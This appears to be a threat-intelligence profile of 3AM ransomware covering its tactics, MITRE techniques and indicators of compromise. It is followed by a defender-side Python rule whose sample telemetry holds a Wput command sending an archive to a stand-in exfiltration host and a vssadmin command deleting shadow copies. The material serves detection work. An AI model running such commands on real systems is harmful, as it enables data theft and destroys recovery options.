3AM Ransomware emerged in late 2023 as a Rust-built, 64-bit ransomware used as a fallback option when deploying LockBit failed, and it disrupts backups and security tools while encrypting targeted files with a “.threeamtime” extension. It has alleged ties to larger threat actors (Conti and Royal) and leverages TOR and other techniques for data exfiltration and extortion.
#3AMRansomware #LockBit #Conti #RoyalRansomware #Wput #CobaltStrike #TOR #USBasedCompanies #NATO
Keypoints
- 3AM Ransomware is Rust-based, targets security/backup services, and renames encrypted files with a “.threeamtime” extension while attempting to delete Volume Shadow Copies.
- Initial activity includes policy discovery with gpresult and extensive reconnaissance using commands like whoami, netstat, quser, and net share.
- Exfiltration is performed using the Wput FTP client before encryption, indicating a data theft phase prior to ransom demands.
- Attackers used Cobalt Strike for lateral movement and leveraged SMB/Windows Admin Shares for propagation within networks.
- TOR is used for ransom negotiations and command-and-control communications, including a dedicated TOR portal for victims.
- Leak site activity shows around 23 victims, with a majority US-based and additional victims from NATO-aligned countries; data leaks are published on their site.
- Security researchers link 3AM to Conti and the Royal ransomware gangs, including use of social media bots to publicize data leaks.
MITRE Techniques
- [T1053] Scheduled Task/Job – ‘Potentially used by 3AM for execution of ransomware or maintaining persistence in the system.’
- [T1082] System Information Discovery – ‘Uses “gpresult” and other commands to gather information and potentially evade defenses based on system configs.’
- [T1140] Deobfuscate/Decode Files or Information – ‘Could be implied in the encryption process or in how it handles the deletion of Volume Shadow Copies.’
- [T1490] Inhibit System Recovery – ‘Specifically targets backup systems and Volume Shadow Copies to hinder recovery efforts.’
- [T1082] System Information Discovery – ‘reconnaissance commands like “whoami,” “netstat,” “quser,” to discover network and server information.’
- [T1083] File and Directory Discovery – ‘Implied through the encryption process targeting specific files.’
- [T1518] Software Discovery – ‘Targeting and disabling security services from well-known vendors.’
- [T1021] Remote Services: SMB/Windows Admin Shares – ‘Lateral movement within the network; uses Cobalt Strike for lateral movement and the Wput tool for data exfiltration.’
- [T1005] Data from Local System – ‘Data is collected before encryption, including sensitive info.’
- [T1056] Input Capture – ‘Implied through the collection of sensitive data from the local network.’
- [T1071] Application Layer Protocol: Web Protocols – ‘Use of TOR for command and control communications.’
- [T1041] Exfiltration Over C2 Channel – ‘Exfiltrates data to attacker-controlled servers using FTP transfer before encryption.’
- [T1486] Data Encrypted for Impact – ‘Encrypts files with a “.threeamtime” extension, disrupts backup systems, and deletes Volume Shadow Copies.’
- [T1491] Defacement – ‘Generating a ransom note in encrypted directories…’
- [T1499] Endpoint Denial of Service – ‘By encrypting files and possibly disabling critical services, 3AM can cause a denial of service to affected systems.’
Indicators of Compromise
- [File Extension] Targeted file encryption – example: document.doc.threeamtime, image.png.threeamtime, and 2 more .threeamtime files
- [File Name] Ransom note – example: RECOVER-FILES, RECOVER-FILES.txt
- [URL] TOR-based recovery portal – example: http://threeam7[REDACTED].onion/recovery
- [URL] Onion leak site indicator – example: ThreeAM Onion Leak Site (leaked data published under victim pages)
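As an added defender-side example (not code from the page or from SOCRadar), the rule below scores a host's process and file events against the behaviours listed in the Keypoints and the Indicators of Compromise above: the discovery burst, the Wput transfer, shadow-copy deletion, and the “.threeamtime” / RECOVER-FILES artifacts. The event schema, the vssadmin command assumed for shadow-copy deletion, and the sample telemetry are assumptions, not taken from the page.

```python
import re
from collections import Counter

# Documented 3AM behaviours: recon commands, Wput FTP exfil, shadow-copy deletion, .threeamtime files.
DISCOVERY_CMDS = {"gpresult", "whoami", "netstat", "quser", "net"}
# Assumed: shadow copies deleted via vssadmin (the page names no specific tool).
SHADOW_DELETE = re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I)

def _exe_name(cmdline: str) -> str:  # first token, lower-cased, path and .exe stripped
    return cmdline.strip().split(" ", 1)[0].lower().rsplit("\\", 1)[-1].removesuffix(".exe")

def classify_event(event: dict):
    """Map one process or file event to a 3AM stage label, or None if unrelated."""
    if event.get("type") == "process":
        cmd = event.get("cmdline", "")
        if SHADOW_DELETE.search(cmd):
            return "inhibit_recovery"
        exe = _exe_name(cmd)
        return "exfil_tool" if exe == "wput" else ("discovery" if exe in DISCOVERY_CMDS else None)
    if event.get("type") == "file":
        name = event.get("path", "").rsplit("\\", 1)[-1]
        if name.lower().endswith(".threeamtime"):
            return "encrypted_file"
        if name.upper().startswith("RECOVER-FILES"):
            return "ransom_note"
    return None

def triage(events: list) -> dict:
    """Summarise which 3AM stages a host's events cover and rate the host."""
    hits = Counter(filter(None, map(classify_event, events)))
    discovery = {_exe_name(e["cmdline"]) for e in events if classify_event(e) == "discovery"}
    stages = {
        "discovery_burst": len(discovery) >= 3,   # several distinct recon commands
        "exfil_tool": hits["exfil_tool"] > 0,     # data theft precedes encryption
        "inhibit_recovery": hits["inhibit_recovery"] > 0,
        "impact": hits["encrypted_file"] + hits["ransom_note"] > 0,
    }
    severity = ("critical" if stages["impact"] or stages["inhibit_recovery"] else
                "high" if stages["exfil_tool"] else "medium" if stages["discovery_burst"] else "none")
    return {"severity": severity, "stages": stages, "hits": dict(hits)}

# Constructed sample telemetry for one host (not real log data).
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": "gpresult /z"},
    {"type": "process", "cmdline": "C:\\Windows\\System32\\whoami.exe /all"},
    {"type": "process", "cmdline": "netstat -ano"},
    {"type": "process", "cmdline": "wput.exe archive.zip ftp://exfil.example/"},
    {"type": "process", "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"type": "file", "path": "C:\\Users\\alice\\Documents\\document.doc.threeamtime"},
]
```

Running `triage(SAMPLE_EVENTS)` on the constructed host rates it critical with every stage set; a host showing only one or two discovery commands scores none, which keeps routine admin use of these tools from paging anyone.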
Read more: https://socradar.io/dark-web-profile-3am-ransomware/